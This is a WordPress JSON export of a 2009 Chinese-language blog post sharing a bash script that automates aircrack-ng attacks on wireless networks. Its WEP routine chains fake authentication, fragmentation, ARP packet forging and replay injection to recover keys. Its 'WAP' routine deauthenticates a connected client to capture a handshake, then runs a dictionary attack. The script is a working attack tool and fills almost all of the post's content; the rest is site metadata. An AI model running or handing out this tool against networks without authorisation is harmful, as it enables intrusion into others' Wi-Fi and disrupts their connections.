{"id":769,"date":"2009-10-12T23:51:20","date_gmt":"2009-10-12T15:51:20","guid":{"rendered":"http:\/\/www.impjq.net\/blog\/2009\/10\/12\/%e7%a0%b4%e8%a7%a3wepwap%e8%84%9a%e6%9c%ac\/"},"modified":"2009-10-12T23:51:20","modified_gmt":"2009-10-12T15:51:20","slug":"%e7%a0%b4%e8%a7%a3wepwap%e8%84%9a%e6%9c%ac","status":"publish","type":"post","link":"https:\/\/pjq.me\/?p=769","title":{"rendered":"\u7834\u89e3wep\/wap\u811a\u672c"},"content":{"rendered":"<p>\u5c06\u4e4b\u524d<a href=\"http:\/\/www.impjq.net\/blog\/2009\/10\/11\/%e7%a0%b4%e8%a7%a3wep%e5%af%86%e7%a0%81%e8%84%9a%e6%9c%ac-2\/\">\u7834\u89e3wep\u811a\u672c<\/a>\u8fdb\u884c\u4e86\u5b8c\u5584\uff0c\u6dfb\u52a0\u4e86\u7834\u89e3wap\u7684\u4ee3\u7801\u3002<\/p>\n<p>\u811a\u672c\u653e\u5728<a href=\"http:\/\/docs.google.com\/View?id=dg9p7dc4_465r2c98dr\">google doc<\/a>\u4e86\u3002<\/p>\n<p><!--more--><\/p>\n<pre lang=\"BASH\" line=\"1\">\ngentoo-pjq 320 # cat crack.sh\n#########################################################################\n# Author: pengjianqing@gmail.com\n# Created Time: Fri 09 Oct 2009 09:37:43 PM CST\n# File Name: crack.sh\n# Description:Welcome to visit:www.impjq.net for more information.\n#Referece:http:\/\/www.cbifamily.com\/hard\/harddim\/2009-05-13\/1242203280d86121.html\n#########################################################################\n#!\/bin\/bash\n\n#Settings\nCHANNEL=6\nTMP=tmp.txt\nPASSWDTXT=\/media\/sdb9\/superdic.txt\nENCRYPTTYPE=64\n\n\nclean()\n{\n    rm *.cap\n    rm fragment*.xor\n    rm *.ivs\n    rm *.csv\n    rm ${TMP}\n    rm *.netxml\n}\n\n\n\ngetwepkey()\n{\n    echo \"Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!\"\n    echo \"**************************************************************************\"\n    echo \"Get the key:\"\n    ls -lht *.ivs\n    read -p \"Input the pack file name,like:crackwep-01.ivs\" RESULT\n    echo \"aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}\"\n    aircrack-ng -n ${ENCRYPTTYPE} -b ${AP_MAC} ${RESULT}\n}\n\ncrackwep()\n{\n    echo \"Now choose crackwep()\"\n    echo \"Display the details on the Channel:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &&gt;${TMP}\"\n    echo \"Please wait for about 30 seconds,then Ctrl+C to interrupt it.\"\n    echo \"use tail -f ${TMP} to see the details\"\n    airodump-ng --ivs -w crackwep -c ${CHANNEL} mon0 &&gt;${TMP}\n    echo \"cat ${TMP}\"\n    cat ${TMP}\n\n    read -p \"Please input essid:\" ESSID\n    echo \"grep ${ESSID} ${TMP}\"\n    AP_MAC=`grep ${ESSID} ${TMP}|cut -d \" \" -f2|head -n 1`\n    echo \"AP_MAC:${AP_MAC}\"\n\n    PC_MAC=`ifconfig|grep wlan0|cut -d \" \" -f10|head -n 1`\n    echo \"PC_MAC:${PC_MAC}\"\n\n    echo \"\u6b3a\u9a97\u6a21\u5f0f:aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0\"\n    aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0\n    read -p \"Association successful?:(y\/n):\" RESULT\n\n    echo \"aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0\"\n    aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0\n\n    echo \"check whether create the fragment-xxxx-xxxx.xor file?\"\n    ls -lht *.xor\n\n    read -p \"Create the fragment-xxxx-xxxx.xor file?(y\/n):\" RESULT\n\n    echo \"packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp\"\n    packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp\n\n\n    echo \"**************************************************************************\"\n    echo \"Now you should run:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &&gt;${TMP} \"\n    echo \"to check the \\#Data  grow to 10000\"\n    echo \"**************************************************************************\"\n    echo \"Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!\"\n    echo \"**************************************************************************\"\n    echo \"aireplay-ng -2 -r mrarp -x 256 mon0\"\n    aireplay-ng -2 -r mrarp -x 256 mon0\n\n#    getwepkey\n}\n\n\ncrackwap()\n{\n    echo \"Now choose crackwap()\"\n    echo \"**************************************************************************\"\n    echo \"Display the details on the Channel:airodump-ng  -w crackwap -c ${CHANNEL} mon0 &&gt;${TMP}\"\n    echo \"Please wait for about 30 seconds,then Ctrl+C to interrupt it.\"\n    echo \"**************************************************************************\"\n    echo \"NOTE:Your should start this in another terminal:airodump-ng -w crackwap -c ${CHANNEL} mon0\"\n    echo \"**************************************************************************\"\n    echo \"use tail -f ${TMP} to see the details\"\n    echo airodump-ng -w crackwap -c ${CHANNEL} mon0 &&gt;${TMP}\n    airodump-ng -w crackwap -c ${CHANNEL} mon0 &&gt;${TMP}\n    echo \"cat ${TMP}\"\n    cat ${TMP}\n\n    read -p \"Please input essid:\" ESSID\n    echo \"grep ${ESSID} ${TMP}\"\n    AP_MAC=`grep ${ESSID} ${TMP}|cut -d \" \" -f2|head -n 1`\n    echo \"AP_MAC:${AP_MAC}\"\n\n    PC_MAC=`ifconfig|grep wlan0|cut -d \" \" -f10|head -n 1`\n    echo \"PC_MAC:${PC_MAC}\"\n\n    STATION_MAC=`grep ${AP_MAC}  ${TMP}|sort|uniq|cut -d \" \" -f4|head -n 1`\n    echo \"STATION_MAC:${STATION_MAC}\"\n\n    read -p \"All the MAC is right?(y\/n):\" RESULT\n\n\n    case \"${RESULT}\" in\n\t\"y\" ) ;;\n\t\"n\" ) echo \"Reset the MAC:\";read -p \"AP_MAC:\" PC_MAC;read -p \"STATION_MAC:\" STATION_MAC;;\n\n\t*   ) echo \"Wrong selection\";;\n    esac\n\n\n    echo \"aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0\"\n    aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0\n\n    read -p \"Get the *.cab file ok?(y\/n):\" RESULT\n\n    echo \"Now Crack the WAP with ${PASSWDTXT}\"\n    echo \"aircrack-ng -w ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap\"\n    aircrack-ng \u2013w  ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap\n}\n\nmenu()\n{\n    echo \"Main Menu\"\n    echo \"Please choose your action:\"\n    echo \"1.wep\"\n    echo \"2.wap\"\n    echo \"q.quit\"\n}\n\nclean\necho \"start wlan0 monitor:airmon-ng start wlan0 ${CHANNEL}\"\nairmon-ng stop mon0\nairmon-ng start wlan0 ${CHANNEL}\necho \"airmon-ng\"\nread -p \"start monitor ok:y\/n?:\" RESULT\n\n\nmenu\nread -p \"Please choose:\" CHOOSE\n\n\nwhile [ \"${CHOOSE}\" != \"q\" ];do\n    case \"${CHOOSE}\" in\n\t\"1\" ) crackwep;;\n\t\"2\" ) crackwap;;\n\t\"q\" ) exit 0;;\n\n\t*   ) echo \"Wrong selection\";;\n    esac\n    menu\n    read -p \"Please Select:\" CHOOSE\n    clear\n\ndone\n<\/pre>\n<div class=\"zemanta-pixie\"><img decoding=\"async\" class=\"zemanta-pixie-img\" alt=\"\" src=\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u5c06\u4e4b\u524d\u7834\u89e3wep\u811a\u672c\u8fdb\u884c\u4e86\u5b8c\u5584\uff0c\u6dfb\u52a0\u4e86\u7834\u89e3wap\u7684\u4ee3\u7801\u3002 \u811a\u672c\u653e\u5728google doc\u4e86\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,6,14],"tags":[],"class_list":["post-769","post","type-post","status-publish","format-standard","hentry","category-bash","category-shell","category-14"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/pjq.me\/?p=769\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u5c06\u4e4b\u524d\u7834\u89e3wep\u811a\u672c\u8fdb\u884c\u4e86\u5b8c\u5584\uff0c\u6dfb\u52a0\u4e86\u7834\u89e3wap\u7684\u4ee3\u7801\u3002 \u811a\u672c\u653e\u5728google doc\u4e86\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/pjq.me\/?p=769\" \/>\n<meta property=\"og:site_name\" content=\"Jianqing&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2009-10-12T15:51:20+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\" \/>\n<meta name=\"author\" content=\"pengjianqing\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"pengjianqing\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/pjq.me\/?p=769#article\",\"isPartOf\":{\"@id\":\"https:\/\/pjq.me\/?p=769\"},\"author\":{\"name\":\"pengjianqing\",\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60\"},\"headline\":\"\u7834\u89e3wep\/wap\u811a\u672c\",\"datePublished\":\"2009-10-12T15:51:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/pjq.me\/?p=769\"},\"wordCount\":6,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60\"},\"image\":{\"@id\":\"https:\/\/pjq.me\/?p=769#primaryimage\"},\"thumbnailUrl\":\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\",\"articleSection\":[\"BASH\",\"shell\",\"\u81ea\u7531\u5206\u7c7b\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/pjq.me\/?p=769#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/pjq.me\/?p=769\",\"url\":\"https:\/\/pjq.me\/?p=769\",\"name\":\"\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog\",\"isPartOf\":{\"@id\":\"https:\/\/pjq.me\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/pjq.me\/?p=769#primaryimage\"},\"image\":{\"@id\":\"https:\/\/pjq.me\/?p=769#primaryimage\"},\"thumbnailUrl\":\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\",\"datePublished\":\"2009-10-12T15:51:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/pjq.me\/?p=769#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/pjq.me\/?p=769\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/pjq.me\/?p=769#primaryimage\",\"url\":\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\",\"contentUrl\":\"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/pjq.me\/?p=769#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/pjq.me\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u7834\u89e3wep\/wap\u811a\u672c\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/pjq.me\/#website\",\"url\":\"https:\/\/pjq.me\/\",\"name\":\"Jianqing&#039;s Blog\",\"description\":\"Thoughts and Future\",\"publisher\":{\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/pjq.me\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60\",\"name\":\"pengjianqing\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/pjq.me\/wp-content\/uploads\/2021\/12\/Screen-Shot-2021-12-02-at-6.10.58-PM.png\",\"contentUrl\":\"https:\/\/pjq.me\/wp-content\/uploads\/2021\/12\/Screen-Shot-2021-12-02-at-6.10.58-PM.png\",\"width\":460,\"height\":752,\"caption\":\"pengjianqing\"},\"logo\":{\"@id\":\"https:\/\/pjq.me\/#\/schema\/person\/image\/\"},\"url\":\"https:\/\/pjq.me\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/pjq.me\/?p=769","og_locale":"en_US","og_type":"article","og_title":"\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog","og_description":"\u5c06\u4e4b\u524d\u7834\u89e3wep\u811a\u672c\u8fdb\u884c\u4e86\u5b8c\u5584\uff0c\u6dfb\u52a0\u4e86\u7834\u89e3wap\u7684\u4ee3\u7801\u3002 \u811a\u672c\u653e\u5728google doc\u4e86\u3002","og_url":"https:\/\/pjq.me\/?p=769","og_site_name":"Jianqing&#039;s Blog","article_published_time":"2009-10-12T15:51:20+00:00","og_image":[{"url":"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365","type":"","width":"","height":""}],"author":"pengjianqing","twitter_card":"summary_large_image","twitter_misc":{"Written by":"pengjianqing","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/pjq.me\/?p=769#article","isPartOf":{"@id":"https:\/\/pjq.me\/?p=769"},"author":{"name":"pengjianqing","@id":"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60"},"headline":"\u7834\u89e3wep\/wap\u811a\u672c","datePublished":"2009-10-12T15:51:20+00:00","mainEntityOfPage":{"@id":"https:\/\/pjq.me\/?p=769"},"wordCount":6,"commentCount":0,"publisher":{"@id":"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60"},"image":{"@id":"https:\/\/pjq.me\/?p=769#primaryimage"},"thumbnailUrl":"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365","articleSection":["BASH","shell","\u81ea\u7531\u5206\u7c7b"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/pjq.me\/?p=769#respond"]}]},{"@type":"WebPage","@id":"https:\/\/pjq.me\/?p=769","url":"https:\/\/pjq.me\/?p=769","name":"\u7834\u89e3wep\/wap\u811a\u672c - Jianqing&#039;s Blog","isPartOf":{"@id":"https:\/\/pjq.me\/#website"},"primaryImageOfPage":{"@id":"https:\/\/pjq.me\/?p=769#primaryimage"},"image":{"@id":"https:\/\/pjq.me\/?p=769#primaryimage"},"thumbnailUrl":"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365","datePublished":"2009-10-12T15:51:20+00:00","breadcrumb":{"@id":"https:\/\/pjq.me\/?p=769#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/pjq.me\/?p=769"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/pjq.me\/?p=769#primaryimage","url":"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365","contentUrl":"http:\/\/img.zemanta.com\/pixy.gif?x-id=a06c835f-7620-8d81-b027-b487cb3e5365"},{"@type":"BreadcrumbList","@id":"https:\/\/pjq.me\/?p=769#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/pjq.me\/"},{"@type":"ListItem","position":2,"name":"\u7834\u89e3wep\/wap\u811a\u672c"}]},{"@type":"WebSite","@id":"https:\/\/pjq.me\/#website","url":"https:\/\/pjq.me\/","name":"Jianqing&#039;s Blog","description":"Thoughts and Future","publisher":{"@id":"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/pjq.me\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/pjq.me\/#\/schema\/person\/0eb1e72d1e69fbbd9b5c0bfd8e2aae60","name":"pengjianqing","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/pjq.me\/#\/schema\/person\/image\/","url":"https:\/\/pjq.me\/wp-content\/uploads\/2021\/12\/Screen-Shot-2021-12-02-at-6.10.58-PM.png","contentUrl":"https:\/\/pjq.me\/wp-content\/uploads\/2021\/12\/Screen-Shot-2021-12-02-at-6.10.58-PM.png","width":460,"height":752,"caption":"pengjianqing"},"logo":{"@id":"https:\/\/pjq.me\/#\/schema\/person\/image\/"},"url":"https:\/\/pjq.me\/?author=1"}]}},"views":3408,"_links":{"self":[{"href":"https:\/\/pjq.me\/index.php?rest_route=\/wp\/v2\/posts\/769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/pjq.me\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pjq.me\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pjq.me\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pjq.me\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=769"}],"version-history":[{"count":0,"href":"https:\/\/pjq.me\/index.php?rest_route=\/wp\/v2\/posts\/769\/revisions"}],"wp:attachment":[{"href":"https:\/\/pjq.me\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pjq.me\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pjq.me\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}